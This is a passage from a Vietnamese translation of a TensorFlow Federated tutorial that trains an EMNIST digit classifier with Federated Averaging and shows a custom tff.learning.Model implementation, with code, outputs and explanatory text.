OrderedDict([('pixels', TensorSpec(shape=(28, 28), dtype=tf.float32, name=None)), ('label', TensorSpec(shape=(), dtype=tf.int32, name=None))])
example_dataset = emnist_train.create_tf_dataset_for_client(
emnist_train.client_ids[0])
example_element = next(iter(example_dataset))
example_element['label'].numpy()
1
from matplotlib import pyplot as plt
plt.imshow(example_element['pixels'].numpy(), cmap='gray', aspect='equal')
plt.grid(False)
_ = plt.show()
Khám phá sự không đồng nhất trong dữ liệu được liên kết
Dữ liệu Federated thường không iid , người dùng thường có sự phân bố dữ liệu khác nhau tùy thuộc vào thói quen sử dụng. Một số khách hàng có thể có ít ví dụ đào tạo hơn trên thiết bị, do dữ liệu bị phân tán cục bộ, trong khi một số khách hàng sẽ có nhiều ví dụ đào tạo hơn. Hãy cùng khám phá khái niệm về tính không đồng nhất dữ liệu điển hình của một hệ thống liên kết với dữ liệu EMNIST mà chúng tôi có sẵn. Điều quan trọng cần lưu ý là phân tích sâu về dữ liệu của khách hàng chỉ có sẵn cho chúng tôi vì đây là môi trường mô phỏng nơi tất cả dữ liệu có sẵn cho chúng tôi tại địa phương. Trong môi trường liên kết sản xuất thực, bạn sẽ không thể kiểm tra dữ liệu của một khách hàng.
Đầu tiên, hãy lấy mẫu dữ liệu của một khách hàng để có cảm nhận về các ví dụ trên một thiết bị mô phỏng. Bởi vì tập dữ liệu chúng tôi đang sử dụng đã được khóa bởi người viết duy nhất, dữ liệu của một khách hàng đại diện cho chữ viết tay của một người cho một mẫu các chữ số từ 0 đến 9, mô phỏng "kiểu sử dụng" duy nhất của một người dùng.
## Example MNIST digits for one client
figure = plt.figure(figsize=(20, 4))
j = 0
for example in example_dataset.take(40):
plt.subplot(4, 10, j+1)
plt.imshow(example['pixels'].numpy(), cmap='gray', aspect='equal')
plt.axis('off')
j += 1
Bây giờ hãy hình dung số lượng ví dụ trên mỗi máy khách cho mỗi nhãn chữ số MNIST. Trong môi trường liên kết, số lượng ví dụ trên mỗi máy khách có thể khác nhau khá nhiều, tùy thuộc vào hành vi của người dùng.
# Number of examples per layer for a sample of clients
f = plt.figure(figsize=(12, 7))
f.suptitle('Label Counts for a Sample of Clients')
for i in range(6):
client_dataset = emnist_train.create_tf_dataset_for_client(
emnist_train.client_ids[i])
plot_data = collections.defaultdict(list)
for example in client_dataset:
# Append counts individually per label to make plots
# more colorful instead of one color per plot.
label = example['label'].numpy()
plot_data[label].append(label)
plt.subplot(2, 3, i+1)
plt.title('Client {}'.format(i))
for j in range(10):
plt.hist(
plot_data[j],
density=False,
bins=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10])
Bây giờ hãy hình dung hình ảnh trung bình trên mỗi khách hàng cho mỗi nhãn MNIST. Mã này sẽ tạo ra giá trị trung bình của mỗi pixel cho tất cả các ví dụ của người dùng cho một nhãn. Chúng ta sẽ thấy rằng hình ảnh có ý nghĩa của một khách hàng cho một chữ số sẽ trông khác với hình ảnh trung bình của một khách hàng khác cho cùng một chữ số, do kiểu chữ viết tay độc đáo của mỗi người. Chúng tôi có thể tìm hiểu về cách mỗi vòng đào tạo địa phương sẽ thúc đẩy mô hình theo một hướng khác nhau đối với từng khách hàng, vì chúng tôi đang học hỏi từ dữ liệu duy nhất của chính người dùng đó trong vòng đào tạo địa phương đó. Ở phần sau của hướng dẫn, chúng ta sẽ xem cách chúng ta có thể thực hiện từng bản cập nhật cho mô hình từ tất cả các khách hàng và tổng hợp chúng lại với nhau thành mô hình toàn cầu mới của chúng tôi, đã học được từ dữ liệu duy nhất của mỗi khách hàng của chúng tôi.
# Each client has different mean images, meaning each client will be nudging
# the model in their own directions locally.
for i in range(5):
client_dataset = emnist_train.create_tf_dataset_for_client(
emnist_train.client_ids[i])
plot_data = collections.defaultdict(list)
for example in client_dataset:
plot_data[example['label'].numpy()].append(example['pixels'].numpy())
f = plt.figure(i, figsize=(12, 5))
f.suptitle("Client #{}'s Mean Image Per Label".format(i))
for j in range(10):
mean_img = np.mean(plot_data[j], 0)
plt.subplot(2, 5, j+1)
plt.imshow(mean_img.reshape((28, 28)))
plt.axis('off')
Dữ liệu người dùng có thể bị nhiễu và được gắn nhãn không đáng tin cậy. Ví dụ: nhìn vào dữ liệu của Khách hàng số 2 ở trên, chúng ta có thể thấy rằng đối với nhãn 2, có thể đã có một số ví dụ được gắn nhãn sai tạo ra một hình ảnh trung bình ồn ào hơn.
Xử lý trước dữ liệu đầu vào
Vì dữ liệu đã làtf.data.Dataset , nên việc xử lý trước có thể được thực hiện bằng cách sử dụng các phép biến đổi Dataset. Ở đây, chúng tôi san phẳng các hình ảnh 28x28 thành các mảng 784 28x28 , xáo trộn các ví dụ riêng lẻ, sắp xếp chúng thành các lô và đổi tên các đối tượng địa lý từ pixels và label thành x và y để sử dụng với Keras. Chúng tôi cũng repeat tập dữ liệu để chạy một số kỷ nguyên.
NUM_CLIENTS = 10
NUM_EPOCHS = 5
BATCH_SIZE = 20
SHUFFLE_BUFFER = 100
PREFETCH_BUFFER = 10
def preprocess(dataset):
def batch_format_fn(element):
"""Flatten a batch `pixels` and return the features as an `OrderedDict`."""
return collections.OrderedDict(
x=tf.reshape(element['pixels'], [-1, 784]),
y=tf.reshape(element['label'], [-1, 1]))
return dataset.repeat(NUM_EPOCHS).shuffle(SHUFFLE_BUFFER).batch(
BATCH_SIZE).map(batch_format_fn).prefetch(PREFETCH_BUFFER)
Hãy xác minh điều này đã hoạt động.
preprocessed_example_dataset = preprocess(example_dataset)
sample_batch = tf.nest.map_structure(lambda x: x.numpy(),
next(iter(preprocessed_example_dataset)))
sample_batch
OrderedDict([('x', array([[1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.], ..., [1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.], [1., 1., 1., ..., 1., 1., 1.]], dtype=float32)), ('y', array([[0], [5], [0], [1], [3], [0], [5], [4], [1], [7], [0], [4], [0], [1], [7], [2], [2], [0], [7], [1]], dtype=int32))])
Chúng tôi có gần như tất cả các khối xây dựng để xây dựng các tập dữ liệu được liên kết.
Một trong những cách để cung cấp dữ liệu liên kết cho TFF trong một mô phỏng đơn giản là dưới dạng danh sách Python, với mỗi phần tử của danh sách chứa dữ liệu của một người dùng cá nhân, cho dù dưới dạng danh sách haytf.data.Dataset . Vì chúng tôi đã có một giao diện cung cấp cái sau, hãy sử dụng nó.
Đây là một hàm trợ giúp đơn giản sẽ tạo danh sách các tập dữ liệu từ một nhóm người dùng nhất định làm đầu vào cho một vòng đào tạo hoặc đánh giá.
def make_federated_data(client_data, client_ids):
return [
preprocess(client_data.create_tf_dataset_for_client(x))
for x in client_ids
]
Bây giờ, chúng ta chọn khách hàng như thế nào?
Trong một kịch bản đào tạo liên hợp điển hình, chúng tôi đang đối phó với một lượng lớn thiết bị người dùng tiềm năng, chỉ một phần nhỏ trong số đó có thể có sẵn để đào tạo tại một thời điểm nhất định. Đây là trường hợp, ví dụ, khi các thiết bị khách hàng là điện thoại di động tham gia đào tạo chỉ khi được cắm vào nguồn điện, tắt mạng đo lường, và nếu không thì không hoạt động.
Tất nhiên, chúng tôi đang ở trong một môi trường mô phỏng và tất cả dữ liệu đều có sẵn tại địa phương. Thông thường, khi chạy mô phỏng, chúng tôi chỉ cần lấy mẫu ngẫu nhiên một tập hợp con khách hàng tham gia vào mỗi vòng đào tạo, thường là khác nhau trong mỗi vòng.
Điều đó nói rằng, như bạn có thể tìm hiểu bằng cách nghiên cứu bài báo về thuật toán Trung bình liên kết , đạt được sự hội tụ trong một hệ thống với các tập hợp con khách hàng được lấy mẫu ngẫu nhiên trong mỗi vòng có thể mất một lúc và sẽ không thực tế nếu phải chạy hàng trăm vòng trong hướng dẫn tương tác này.
Thay vào đó, những gì chúng tôi sẽ làm là lấy mẫu tập khách hàng một lần và sử dụng lại cùng một tập hợp đó qua các vòng để tăng tốc độ hội tụ (cố ý phù hợp quá mức với dữ liệu của một số người dùng này). Chúng tôi để nó như một bài tập cho người đọc để sửa đổi hướng dẫn này để mô phỏng lấy mẫu ngẫu nhiên - nó khá dễ thực hiện (một khi bạn làm như vậy, hãy nhớ rằng để mô hình hội tụ có thể mất một lúc).
sample_clients = emnist_train.client_ids[0:NUM_CLIENTS]
federated_train_data = make_federated_data(emnist_train, sample_clients)
print('Number of client datasets: {l}'.format(l=len(federated_train_data)))
print('First dataset: {d}'.format(d=federated_train_data[0]))
Number of client datasets: 10 First dataset: <DatasetV1Adapter shapes: OrderedDict([(x, (None, 784)), (y, (None, 1))]), types: OrderedDict([(x, tf.float32), (y, tf.int32)])>
Tạo mô hình với Keras
Nếu bạn đang sử dụng Keras, bạn có thể đã có mã xây dựng mô hình Keras. Đây là một ví dụ về một mô hình đơn giản sẽ đáp ứng đủ nhu cầu của chúng tôi.
def create_keras_model():
return tf.keras.models.Sequential([
tf.keras.layers.Input(shape=(784,)),
tf.keras.layers.Dense(10, kernel_initializer='zeros'),
tf.keras.layers.Softmax(),
])
Để sử dụng bất kỳ mô hình nào với TFF, nó cần phải được bao bọc trong một phiên bản của giao diện tff.learning.Model , giao diện này hiển thị các phương thức đóng dấu chuyển tiếp của mô hình, thuộc tính siêu dữ liệu, v.v., tương tự như Keras, nhưng cũng giới thiệu thêm các phần tử, chẳng hạn như các cách kiểm soát quá trình tính toán các chỉ số liên hợp. Đừng lo lắng về điều này bây giờ; nếu bạn có một mô hình Keras như mô hình mà chúng tôi vừa xác định ở trên, bạn có thể yêu cầu TFF bọc nó cho bạn bằng cách gọi tff.learning.from_keras_model , chuyển mô hình và một lô dữ liệu mẫu làm đối số, như được hiển thị bên dưới.
def model_fn():
# We _must_ create a new model here, and _not_ capture it from an external
# scope. TFF will call this within different graph contexts.
keras_model = create_keras_model()
return tff.learning.from_keras_model(
keras_model,
input_spec=preprocessed_example_dataset.element_spec,
loss=tf.keras.losses.SparseCategoricalCrossentropy(),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()])
Đào tạo mô hình trên dữ liệu liên kết
Bây giờ chúng ta có một mô hình được bao bọc dưới dạng tff.learning.Model để sử dụng với TFF, chúng ta có thể để TFF xây dựng thuật toán Trung bình liên kết bằng cách gọi hàm trợ giúp tff.learning.build_federated_averaging_process , như sau.
Hãy nhớ rằng đối số cần phải là một phương thức khởi tạo (chẳng hạn như model_fn ở trên), không phải là một phiên bản đã được xây dựng, để việc xây dựng mô hình của bạn có thể xảy ra trong ngữ cảnh do TFF kiểm soát (nếu bạn tò mò về lý do điều này, chúng tôi khuyến khích bạn đọc hướng dẫn tiếp theo về các thuật toán tùy chỉnh ).
Một lưu ý quan trọng về thuật toán Trung bình liên kết bên dưới, có 2 trình tối ưu hóa: trình tối ưu hóa _client và trình tối ưu hóa _server. Trình tối ưu hóa _client chỉ được sử dụng để tính toán các bản cập nhật mô hình cục bộ trên mỗi máy khách. Trình tối ưu hóa _server áp dụng cập nhật trung bình cho mô hình chung tại máy chủ. Đặc biệt, điều này có nghĩa là lựa chọn trình tối ưu hóa và tốc độ học được sử dụng có thể cần phải khác với lựa chọn bạn đã sử dụng để đào tạo mô hình trên tập dữ liệu iid tiêu chuẩn. Chúng tôi khuyên bạn nên bắt đầu với SGD thông thường, có thể với tỷ lệ học tập nhỏ hơn bình thường. Tỷ lệ học tập mà chúng tôi sử dụng chưa được điều chỉnh cẩn thận, hãy thoải mái thử nghiệm.
iterative_process = tff.learning.build_federated_averaging_process(
model_fn,
client_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=0.02),
server_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=1.0))
Chuyện gì vừa xảy ra? TFF đã xây dựng một cặp phép tính liên hợp và đóng gói chúng thành một tff.templates.IterativeProcess trong đó các phép tính này có sẵn như một cặp thuộc tính initialize và next .
Tóm lại, tính toán liên hợp là các chương trình bằng ngôn ngữ nội bộ của TFF có thể thể hiện các thuật toán liên hợp khác nhau (bạn có thể tìm thêm về điều này trong hướng dẫn thuật toán tùy chỉnh ). Trong trường hợp này, hai phép tính được tạo và đóng gói thành iterative_process thực hiện Trung bình Liên kết .
Mục tiêu của TFF là xác định các tính toán theo cách mà chúng có thể được thực thi trong các cài đặt học liên kết thực, nhưng hiện tại chỉ thời gian chạy mô phỏng thực thi cục bộ mới được thực hiện. Để thực thi một phép tính trong trình mô phỏng, bạn chỉ cần gọi nó giống như một hàm Python. Môi trường thông dịch mặc định này không được thiết kế cho hiệu suất cao, nhưng nó sẽ đủ cho hướng dẫn này; chúng tôi hy vọng sẽ cung cấp thời gian chạy mô phỏng hiệu suất cao hơn để tạo điều kiện cho nghiên cứu quy mô lớn hơn trong các bản phát hành trong tương lai.
Hãy bắt đầu với tính toán initialize . Như trường hợp của tất cả các phép tính liên hợp, bạn có thể coi nó như một hàm. Tính toán không có đối số và trả về một kết quả - biểu diễn trạng thái của quá trình Tính trung bình liên kết trên máy chủ. Mặc dù chúng tôi không muốn đi sâu vào chi tiết của TFF, nhưng có thể là hướng dẫn để xem trạng thái này trông như thế nào. Bạn có thể hình dung nó như sau.
str(iterative_process.initialize.type_signature)
'( -> <model=<trainable=<float32[784,10],float32[10]>,non_trainable=<>>,optimizer_state=<int64>,delta_aggregate_state=<value_sum_process=<>,weight_sum_process=<>>,model_broadcast_state=<>>@SERVER)'
Mặc dù chữ ký kiểu trên thoạt đầu có vẻ hơi khó hiểu, nhưng bạn có thể nhận ra rằng trạng thái máy chủ bao gồm một model (các tham số mô hình ban đầu cho MNIST sẽ được phân phối cho tất cả các thiết bị) và optimizer_state (thông tin bổ sung được máy chủ duy trì, chẳng hạn như số vòng để sử dụng cho lịch biểu siêu thông số, v.v.).
Hãy gọi tính toán initialize để xây dựng trạng thái máy chủ.
state = iterative_process.initialize()
next , cặp tính toán liên kết thứ hai đại diện cho một vòng Trung bình liên kết, bao gồm việc đẩy trạng thái máy chủ (bao gồm các tham số mô hình) cho khách hàng, đào tạo trên thiết bị về dữ liệu cục bộ của họ, thu thập và tính trung bình các cập nhật mô hình và tạo ra một mô hình cập nhật mới tại máy chủ.
Về mặt lý thuyết, bạn có thể nghĩ next là có một loại chữ ký chức năng rằng ngoại hình như sau.
SERVER_STATE, FEDERATED_DATA -> SERVER_STATE, TRAINING_METRICS
Đặc biệt, người ta nên nghĩ về next() không phải là một hàm chạy trên máy chủ, mà là một biểu diễn chức năng khai báo của toàn bộ tính toán phi tập trung - một số đầu vào được cung cấp bởi máy chủ ( SERVER_STATE ), nhưng mỗi đầu vào đều tham gia thiết bị đóng góp tập dữ liệu cục bộ của riêng nó.
Hãy chạy một vòng đào tạo và hình dung kết quả. Chúng tôi có thể sử dụng dữ liệu liên kết mà chúng tôi đã tạo ở trên cho một mẫu người dùng.
state, metrics = iterative_process.next(state, federated_train_data)
print('round 1, metrics={}'.format(metrics))
round 1, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.11502057), ('loss', 3.244929)]))])
Chạy thêm vài vòng nữa. Như đã lưu ý trước đó, thông thường tại thời điểm này, bạn sẽ chọn một tập hợp con dữ liệu mô phỏng của mình từ một mẫu người dùng mới được chọn ngẫu nhiên cho mỗi vòng để mô phỏng một triển khai thực tế trong đó người dùng liên tục đến và đi, nhưng trong sổ tay tương tác này, vì mục đích minh chứng là chúng tôi sẽ chỉ sử dụng lại những người dùng giống nhau, để hệ thống hội tụ nhanh chóng.
NUM_ROUNDS = 11
for round_num in range(2, NUM_ROUNDS):
state, metrics = iterative_process.next(state, federated_train_data)
print('round {:2d}, metrics={}'.format(round_num, metrics))
round 2, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.14609054), ('loss', 2.9141645)]))]) round 3, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.15205762), ('loss', 2.9237952)]))]) round 4, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.18600823), ('loss', 2.7629454)]))]) round 5, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.20884773), ('loss', 2.622908)]))]) round 6, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.21872428), ('loss', 2.543587)]))]) round 7, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.2372428), ('loss', 2.4210362)]))]) round 8, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.28209877), ('loss', 2.2297976)]))]) round 9, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.2685185), ('loss', 2.195803)]))]) round 10, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('sparse_categorical_accuracy', 0.33868313), ('loss', 2.0523348)]))])
Tổn thất trong huấn luyện đang giảm dần sau mỗi đợt huấn luyện liên đoàn, cho thấy mô hình đang hội tụ. Tuy nhiên, có một số lưu ý quan trọng với các chỉ số đào tạo này, hãy xem phần Đánh giá ở phần sau của hướng dẫn này.
Hiển thị số liệu mô hình trong TensorBoard
Tiếp theo, hãy hình dung các số liệu từ các phép tính liên hợp này bằng Tensorboard.
Hãy bắt đầu bằng cách tạo thư mục và trình viết tóm tắt tương ứng để ghi các số liệu vào.
logdir = "/tmp/logs/scalars/training/"
summary_writer = tf.summary.create_file_writer(logdir)
state = iterative_process.initialize()
Vẽ biểu đồ các chỉ số vô hướng có liên quan với cùng một người viết tóm tắt.
with summary_writer.as_default():
for round_num in range(1, NUM_ROUNDS):
state, metrics = iterative_process.next(state, federated_train_data)
for name, value in metrics['train'].items():
tf.summary.scalar(name, value, step=round_num)
Khởi động TensorBoard với thư mục nhật ký gốc được chỉ định ở trên. Có thể mất vài giây để tải dữ liệu.
!ls {logdir}
%tensorboard --logdir {logdir} --port=0
events.out.tfevents.1604020204.isim77-20020ad609500000b02900f40f27a5f6.prod.google.com.686098.10633.v2 events.out.tfevents.1604020602.isim77-20020ad609500000b02900f40f27a5f6.prod.google.com.794554.10607.v2 Launching TensorBoard... <IPython.core.display.Javascript at 0x7fc5e8d3c128>
# Uncomment and run this this cell to clean your directory of old output for
# future graphs from this directory. We don't run it by default so that if
# you do a "Runtime > Run all" you don't lose your results.
# !rm -R /tmp/logs/scalars/*
Để xem các chỉ số đánh giá theo cách tương tự, bạn có thể tạo một thư mục eval riêng, như "nhật ký / scalars / eval", để ghi vào TensorBoard.
Tùy chỉnh việc triển khai mô hình
Tuy nhiên, tff.learning cung cấp giao diện mô hình cấp thấp hơn, tff.learning.Model , hiển thị chức năng tối thiểu cần thiết để sử dụng mô hình cho việc học liên kết. Việc triển khai trực tiếp giao diện này (có thể vẫn sử dụng các khối xây dựng nhưtf.keras.layers ) cho phép tùy chỉnh tối đa mà không cần sửa đổi nội bộ của các thuật toán học liên hợp.
Vì vậy, chúng ta hãy làm lại từ đầu.
Xác định các biến mô hình, chuyển tiếp và số liệu
Bước đầu tiên là xác định các biến TensorFlow mà chúng ta sẽ làm việc với. Để làm cho đoạn mã sau dễ đọc hơn, hãy xác định cấu trúc dữ liệu để đại diện cho toàn bộ tập hợp. Điều này sẽ bao gồm các biến như weights và bias rằng chúng tôi sẽ đào tạo, cũng như các biến mà sẽ tổ chức thống kê khác nhau tích lũy và quầy chúng tôi sẽ cập nhật trong thời gian đào tạo, chẳng hạn như loss_sum , accuracy_sum , và num_examples .
MnistVariables = collections.namedtuple(
'MnistVariables', 'weights bias num_examples loss_sum accuracy_sum')
Đây là một phương pháp tạo các biến. Để đơn giản, chúng tôi biểu thị tất cả các thống kê dưới dạng tf.float32 , vì điều đó sẽ loại bỏ nhu cầu chuyển đổi kiểu ở giai đoạn sau. Gói các bộ khởi tạo biến dưới dạng lambdas là một yêu cầu do các biến tài nguyên áp đặt.
def create_mnist_variables():
return MnistVariables(
weights=tf.Variable(
lambda: tf.zeros(dtype=tf.float32, shape=(784, 10)),
name='weights',
trainable=True),
bias=tf.Variable(
lambda: tf.zeros(dtype=tf.float32, shape=(10)),
name='bias',
trainable=True),
num_examples=tf.Variable(0.0, name='num_examples', trainable=False),
loss_sum=tf.Variable(0.0, name='loss_sum', trainable=False),
accuracy_sum=tf.Variable(0.0, name='accuracy_sum', trainable=False))
Với các biến cho tham số mô hình và thống kê tích lũy, giờ đây chúng ta có thể xác định phương pháp chuyển tiếp tính toán tổn thất, đưa ra dự đoán và cập nhật thống kê tích lũy cho một lô dữ liệu đầu vào, như sau.
def mnist_forward_pass(variables, batch):
y = tf.nn.softmax(tf.matmul(batch['x'], variables.weights) + variables.bias)
predictions = tf.cast(tf.argmax(y, 1), tf.int32)
flat_labels = tf.reshape(batch['y'], [-1])
loss = -tf.reduce_mean(
tf.reduce_sum(tf.one_hot(flat_labels, 10) * tf.math.log(y), axis=[1]))
accuracy = tf.reduce_mean(
tf.cast(tf.equal(predictions, flat_labels), tf.float32))
num_examples = tf.cast(tf.size(batch['y']), tf.float32)
variables.num_examples.assign_add(num_examples)
variables.loss_sum.assign_add(loss * num_examples)
variables.accuracy_sum.assign_add(accuracy * num_examples)
return loss, predictions
Tiếp theo, chúng tôi xác định một hàm trả về một tập hợp các chỉ số cục bộ, một lần nữa bằng cách sử dụng TensorFlow. Đây là các giá trị (ngoài các bản cập nhật mô hình, được xử lý tự động) đủ điều kiện để được tổng hợp vào máy chủ trong quá trình học tập hoặc đánh giá được liên kết.
Ở đây, chúng tôi chỉ trả về loss và accuracy trung bình, cũng như num_examples , chúng tôi sẽ cần cân nhắc chính xác các đóng góp từ những người dùng khác nhau khi tính toán tổng hợp liên kết.
def get_local_mnist_metrics(variables):
return collections.OrderedDict(
num_examples=variables.num_examples,
loss=variables.loss_sum / variables.num_examples,
accuracy=variables.accuracy_sum / variables.num_examples)
Cuối cùng, chúng ta cần xác định cách tổng hợp các chỉ số cục bộ do mỗi thiết bị phát ra thông qua get_local_mnist_metrics . Đây là phần duy nhất của mã không được viết trong TensorFlow - đó là một phép tính liên hợp được thể hiện trong TFF. Nếu bạn muốn tìm hiểu sâu hơn, hãy đọc lướt qua hướng dẫn thuật toán tùy chỉnh , nhưng trong hầu hết các ứng dụng, bạn sẽ không thực sự cần; các biến thể của mẫu hiển thị bên dưới là đủ. Đây là những gì nó trông giống như:
@tff.federated_computation
def aggregate_mnist_metrics_across_clients(metrics):
return collections.OrderedDict(
num_examples=tff.federated_sum(metrics.num_examples),
loss=tff.federated_mean(metrics.loss, metrics.num_examples),
accuracy=tff.federated_mean(metrics.accuracy, metrics.num_examples))
Đối metrics đầu vào tương ứng với OrderedDict trả về bởi get_local_mnist_metrics ở trên, nhưng quan trọng là các giá trị không còn là tf.Tensors - chúng được "đóng hộp" dưới dạng tff.Value s, để làm rõ rằng bạn không còn có thể thao tác chúng bằng TensorFlow nữa, mà chỉ sử dụng các toán tử liên hợp của TFF như tff.federated_mean và tff.federated_sum . Từ điển tổng hợp toàn cầu được trả về xác định tập hợp số liệu sẽ có sẵn trên máy chủ.
Xây dựng một phiên bản của tff.learning.Model
Với tất cả những điều trên, chúng tôi đã sẵn sàng xây dựng một biểu diễn mô hình để sử dụng với TFF tương tự như một biểu diễn được tạo cho bạn khi bạn cho phép TFF nhập mô hình Keras.
class MnistModel(tff.learning.Model):
def __init__(self):
self._variables = create_mnist_variables()
@property
def trainable_variables(self):
return [self._variables.weights, self._variables.bias]
@property
def non_trainable_variables(self):
return []
@property
def local_variables(self):
return [
self._variables.num_examples, self._variables.loss_sum,
self._variables.accuracy_sum
]
@property
def input_spec(self):
return collections.OrderedDict(
x=tf.TensorSpec([None, 784], tf.float32),
y=tf.TensorSpec([None, 1], tf.int32))
@tf.function
def forward_pass(self, batch, training=True):
del training
loss, predictions = mnist_forward_pass(self._variables, batch)
num_exmaples = tf.shape(batch['x'])[0]
return tff.learning.BatchOutput(
loss=loss, predictions=predictions, num_examples=num_exmaples)
@tf.function
def report_local_outputs(self):
return get_local_mnist_metrics(self._variables)
@property
def federated_output_computation(self):
return aggregate_mnist_metrics_across_clients
Như bạn có thể thấy, các phương thức và thuộc tính trừu tượng được xác định bởi tff.learning.Model tương ứng với các đoạn mã trong phần trước đã giới thiệu các biến và xác định tổn thất và thống kê.
Dưới đây là một số điểm đáng chú ý:
Tất cả trạng thái mà mô hình của bạn sẽ sử dụng phải được ghi lại dưới dạng các biến TensorFlow, vì TFF không sử dụng Python trong thời gian chạy (hãy nhớ mã của bạn phải được viết sao cho nó có thể được triển khai cho thiết bị di động; xem hướng dẫn thuật toán tùy chỉnh để biết thêm chi tiết bình luận về lý do).
Mô hình của bạn nên mô tả dạng dữ liệu mà nó chấp nhận ( input_spec), vì nói chung, TFF là một môi trường được đánh máy mạnh và muốn xác định chữ ký kiểu cho tất cả các thành phần. Khai báo định dạng của đầu vào mô hình của bạn là một phần thiết yếu của nó.
Mặc dù không bắt buộc về mặt kỹ thuật, chúng tôi khuyên bạn nên gói tất cả logic TensorFlow (chuyển tiếp, tính toán số liệu, v.v.) dưới dạng tf.function.tf.function, vì điều này giúp đảm bảo TensorFlow có thể được tuần tự hóa và loại bỏ nhu cầu phụ thuộc điều khiển rõ ràng.
Trên đây là đủ để đánh giá và các thuật toán như Federated SGD. Tuy nhiên, đối với Tính trung bình liên kết, chúng ta cần chỉ định cách mô hình sẽ đào tạo cục bộ trên mỗi lô. Chúng tôi sẽ chỉ định một trình tối ưu hóa cục bộ khi xây dựng thuật toán Trung bình Liên kết.
Mô phỏng đào tạo liên đoàn với mô hình mới
Với tất cả những điều ở trên, phần còn lại của quá trình trông giống như những gì chúng ta đã thấy - chỉ cần thay thế hàm tạo mô hình bằng hàm tạo của lớp mô hình mới của chúng tôi và sử dụng hai phép tính liên kết trong quy trình lặp lại mà bạn đã tạo để chuyển qua các vòng huấn luyện.
iterative_process = tff.learning.build_federated_averaging_process(
MnistModel,
client_optimizer_fn=lambda: tf.keras.optimizers.SGD(learning_rate=0.02))
state = iterative_process.initialize()
state, metrics = iterative_process.next(state, federated_train_data)
print('round 1, metrics={}'.format(metrics))
round 1, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 3.1527398), ('accuracy', 0.12469136)]))])
for round_num in range(2, 11):
state, metrics = iterative_process.next(state, federated_train_data)
print('round {:2d}, metrics={}'.format(round_num, metrics))
round 2, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.941014), ('accuracy', 0.14218107)]))]) round 3, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.9052832), ('accuracy', 0.14444445)]))]) round 4, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.7491086), ('accuracy', 0.17962962)]))]) round 5, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.5129666), ('accuracy', 0.19526748)]))]) round 6, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.4175923), ('accuracy', 0.23600823)]))]) round 7, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.4273515), ('accuracy', 0.24176955)]))]) round 8, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.2426176), ('accuracy', 0.2802469)]))]) round 9, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.1567981), ('accuracy', 0.295679)]))]) round 10, metrics=OrderedDict([('broadcast', ()), ('aggregation', OrderedDict([('value_sum_process', ()), ('weight_sum_process', ())])), ('train', OrderedDict([('num_examples', 4860.0), ('loss', 2.1092515), ('accuracy', 0.30843621)]))])
Để xem các chỉ số này trong TensorBoard, hãy tham khảo các bước được liệt kê ở trên trong "Hiển thị chỉ số mô hình trong TensorBoard".
Đánh giá
